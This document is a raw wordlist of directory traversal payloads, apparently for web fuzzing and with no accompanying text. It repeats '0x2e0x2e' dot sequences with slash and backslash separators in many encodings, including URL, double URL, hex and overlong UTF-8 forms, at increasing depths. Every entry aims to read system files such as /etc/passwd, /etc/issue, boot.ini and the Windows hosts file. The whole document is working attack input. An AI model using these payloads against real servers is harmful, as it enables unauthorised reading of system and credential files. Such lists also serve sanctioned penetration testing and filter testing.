-0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\windows\system32\drivers\etc\hosts -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\issue -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\windows\system32\drivers\etc\hosts -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\issue -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\windows\system32\drivers\etc\hosts -0x2e0x2e%2fetc%2fpasswd -0x2e0x2e%2fetc%2fissue -0x2e0x2e%2fboot.ini -0x2e0x2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -0x2e0x2e%2f0x2e0x2e%2fetc%2fpasswd -0x2e0x2e%2f0x2e0x2e%2fetc%2fissue -0x2e0x2e%2f0x2e0x2e%2fboot.ini -0x2e0x2e%2f0x2e0x2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fpasswd -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fissue -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fboot.ini -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fpasswd -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fissue -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fboot.ini -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fpasswd -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fissue -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fboot.ini -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fpasswd -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fetc%2fissue -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fboot.ini -0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2f0x2e0x2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -0x2e0x2e%5cetc%5cpasswd -0x2e0x2e%5cetc%5cissue -0x2e0x2e%5cboot.ini -0x2e0x2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -0x2e0x2e%5c0x2e0x2e%5cetc%5cpasswd -0x2e0x2e%5c0x2e0x2e%5cetc%5cissue -0x2e0x2e%5c0x2e0x2e%5cboot.ini -0x2e0x2e%5c0x2e0x2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cpasswd -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cissue -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cboot.ini -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cpasswd -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cissue -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cboot.ini -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cpasswd -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cissue -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cboot.ini -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cpasswd -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cissue -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cboot.ini -0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -0x2e0x2e0x2fetc0x2fpasswd -0x2e0x2e0x2fetc0x2fissue -0x2e0x2e0x2fboot.ini -0x2e0x2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fpasswd -0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fissue -0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fpasswd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fissue -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fpasswd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fissue -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fpasswd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fissue -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fpasswd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fetc0x2fissue -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -0x2e0x2e0x5cetc0x5cpasswd -0x2e0x2e0x5cetc0x5cissue -0x2e0x2e0x5cboot.ini -0x2e0x2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cpasswd -0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cissue -0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cpasswd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cissue -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cpasswd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cissue -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cpasswd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cissue -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cpasswd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cetc0x5cissue -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -0x2e0x2e%252fetc%252fpasswd -0x2e0x2e%252fetc%252fissue -0x2e0x2e%252fboot.ini -0x2e0x2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -0x2e0x2e%252f0x2e0x2e%252fetc%252fpasswd -0x2e0x2e%252f0x2e0x2e%252fetc%252fissue -0x2e0x2e%252f0x2e0x2e%252fboot.ini -0x2e0x2e%252f0x2e0x2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fpasswd -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fissue -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fboot.ini -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fpasswd -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fissue -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fboot.ini -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fpasswd -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fissue -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fboot.ini -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fpasswd -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fetc%252fissue -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fboot.ini -0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252f0x2e0x2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -0x2e0x2e%255cetc%255cpasswd -0x2e0x2e%255cetc%255cissue -0x2e0x2e%255cboot.ini -0x2e0x2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -0x2e0x2e%255c0x2e0x2e%255cetc%255cpasswd -0x2e0x2e%255c0x2e0x2e%255cetc%255cissue -0x2e0x2e%255c0x2e0x2e%255cboot.ini -0x2e0x2e%255c0x2e0x2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cpasswd -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cissue -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cboot.ini -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cpasswd -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cissue -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cboot.ini -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cpasswd -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cissue -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cboot.ini -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cpasswd -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cissue -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cboot.ini -0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -0x2e0x2e%c0%2fetc%c0%2fpasswd -0x2e0x2e%c0%2fetc%c0%2fissue -0x2e0x2e%c0%2fboot.ini -0x2e0x2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fpasswd -0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fissue -0x2e0x2e%c0%2f0x2e0x2e%c0%2fboot.ini -0x2e0x2e%c0%2f0x2e0x2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fpasswd -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fissue -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fboot.ini -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fpasswd -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fissue -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fboot.ini -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fpasswd -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fissue -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fboot.ini -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fpasswd -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fetc%c0%2fissue -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fboot.ini -0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2f0x2e0x2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -0x2e0x2e%c0%afetc%c0%afpasswd -0x2e0x2e%c0%afetc%c0%afissue -0x2e0x2e%c0%afboot.ini -0x2e0x2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afpasswd -0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afissue -0x2e0x2e%c0%af0x2e0x2e%c0%afboot.ini -0x2e0x2e%c0%af0x2e0x2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afpasswd -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afissue -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afboot.ini -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afpasswd -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afissue -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afboot.ini -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afpasswd -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afissue -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afboot.ini -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afpasswd -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afetc%c0%afissue -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afboot.ini -0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%af0x2e0x2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -0x2e0x2e%c0%5cetc%c0%5cpasswd -0x2e0x2e%c0%5cetc%c0%5cissue -0x2e0x2e%c0%5cboot.ini -0x2e0x2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cpasswd -0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cissue -0x2e0x2e%c0%5c0x2e0x2e%c0%5cboot.ini -0x2e0x2e%c0%5c0x2e0x2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cpasswd -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cissue -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cboot.ini -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cpasswd -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cissue -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cboot.ini -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cpasswd -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cissue -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cboot.ini -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cpasswd -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cetc%c0%5cissue -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cboot.ini -0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5c0x2e0x2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -0x2e0x2e%c1%9cetc%c1%9cpasswd -0x2e0x2e%c1%9cetc%c1%9cissue -0x2e0x2e%c1%9cboot.ini -0x2e0x2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cpasswd -0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cissue -0x2e0x2e%c1%9c0x2e0x2e%c1%9cboot.ini -0x2e0x2e%c1%9c0x2e0x2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cpasswd -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cissue -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cboot.ini -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cpasswd -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cissue -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cboot.ini -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cpasswd -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cissue -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cboot.ini -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cpasswd -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cetc%c1%9cissue -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cboot.ini -0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9c0x2e0x2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -0x2e0x2e%c1%pcetc%c1%pcpasswd -0x2e0x2e%c1%pcetc%c1%pcissue -0x2e0x2e%c1%pcboot.ini -0x2e0x2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcpasswd -0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcissue -0x2e0x2e%c1%pc0x2e0x2e%c1%pcboot.ini -0x2e0x2e%c1%pc0x2e0x2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcpasswd -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcissue -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcboot.ini -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts 